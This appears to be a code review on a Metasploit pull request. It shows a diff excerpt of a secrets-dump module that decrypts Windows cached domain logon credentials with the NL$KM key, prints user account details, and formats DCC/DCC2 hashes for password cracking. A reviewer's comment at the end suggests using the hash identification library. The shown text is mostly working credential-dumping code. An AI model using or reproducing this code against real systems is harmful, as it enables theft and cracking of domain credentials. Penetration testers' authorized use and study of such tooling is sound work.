modules/auxiliary/gather/windows_secrets_dump.rb

```diff
@@ -0,0 +1,1130 @@
+
+        enc_data = cache.enc_data.map {|e| e.chr}.join
+        if lsa_vista_style?
+          dec_data = decrypt_hash_vista(enc_data, nlkm_key, cache.iv)
+        else
+          dec_data = decrypt_hash(enc_data, nlkm_key, cache.iv)
+        end
+
+        vprint_status("Decrypted data: #{dec_data.unpack('H*')[0]}")
+
+        params = cache.snapshot.to_h.select { |key, _v| key.to_s.end_with?('_length') }
+        params[:group_count] = cache.group_count
+        cache_data = CacheData.new(params).read(dec_data)
+        username = cache_data.username.encode(Encoding::UTF_8)
+        if iteration_count.nil? && lsa_vista_style?
+          if (cache.iteration_count > 10240)
+            iteration_count = cache.iteration_count & 0xfffffc00
+          else
+            iteration_count = cache.iteration_count * 1024
+          end
+        end
+        info = []
+        info << ("Username: #{username}")
+        if iteration_count
+          info << ("Iteration count: #{cache.iteration_count} -> real #{iteration_count}")
+        end
+        info << ("Last login: #{cache.last_access.to_time}")
+        dns_domain_name = cache_data.dns_domain_name.encode(Encoding::UTF_8)
+        info << ("DNS Domain Name: #{dns_domain_name}")
+        info << ("UPN: #{cache_data.upn.encode(Encoding::UTF_8)}")
+        info << ("Effective Name: #{cache_data.effective_name.encode(Encoding::UTF_8)}")
+        info << ("Full Name: #{cache_data.full_name.encode(Encoding::UTF_8)}")
+        info << ("Logon Script: #{cache_data.logon_script.encode(Encoding::UTF_8)}")
+        info << ("Profile Path: #{cache_data.profile_path.encode(Encoding::UTF_8)}")
+        info << ("Home Directory: #{cache_data.home_directory.encode(Encoding::UTF_8)}")
+        info << ("Home Directory Drive: #{cache_data.home_directory_drive.encode(Encoding::UTF_8)}")
+        info << ("User ID: #{cache.user_id}")
+        info << ("Primary Group ID: #{cache.primary_group_id}")
+        info << ("Additional groups: #{cache_data.groups.map {|g| g.relative_id}.join(' ')}")
+        logon_domain_name = cache_data.logon_domain_name.encode(Encoding::UTF_8)
+        info << ("Logon domain name: #{logon_domain_name}")
+
+        report_info(info.join("; "), 'user.cache_info')
+        vprint_line(info.join("\n"))
+
+        credential_opts = {
+          type:        :nonreplayable_hash,
+          realm_key:   Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+          realm_value: logon_domain_name
+        }
+        if lsa_vista_style?
+          jtr_hash = "#{logon_domain_name}/#{username}:$DCC2$#{iteration_count}##{username}##{cache_data.enc_hash.to_hex}:#{dns_domain_name}:#{logon_domain_name}"
+          credential_opts[:jtr_format] = 'mscash2'
+        else
+          jtr_hash = "#{logon_domain_name}/#{username}:M$#{username}##{cache_data.enc_hash.to_hex}:#{dns_domain_name}:#{logon_domain_name}"
+          credential_opts[:jtr_format] = 'mscash'
```

Comment:
Prefer this would use the hash identification library for consistency.
https://github.com/rapid7/metasploit-framework/wiki/Hashes-and-Password-Cracking#hash-identify-example